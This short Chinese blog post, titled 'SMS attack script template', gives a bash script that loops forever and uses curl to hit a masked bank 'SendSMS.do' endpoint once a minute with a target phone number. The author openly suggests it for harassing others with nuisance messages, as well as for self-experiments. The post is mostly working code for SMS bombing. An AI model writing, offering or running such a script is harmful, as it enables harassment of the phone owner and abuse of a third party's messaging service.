短信攻击脚本模版

脚本是1分钟发一次短信。可以做个攻击别人的打扰信息,自己做实验的可以。

#!/bin/bash
while [ 1 ]
do
echo "had send msg";
curl --data "BankId=99999&ChannelId=PC&IsEncrypt=N&PhoneNo=12345678912&_locale=zh_CN&_vTokenName=null" "http://****.com/mpweb/SendSMS.do"

sleep 60
done;

#执行
sh a.sh

你可能感兴趣的:(短信攻击脚本模版)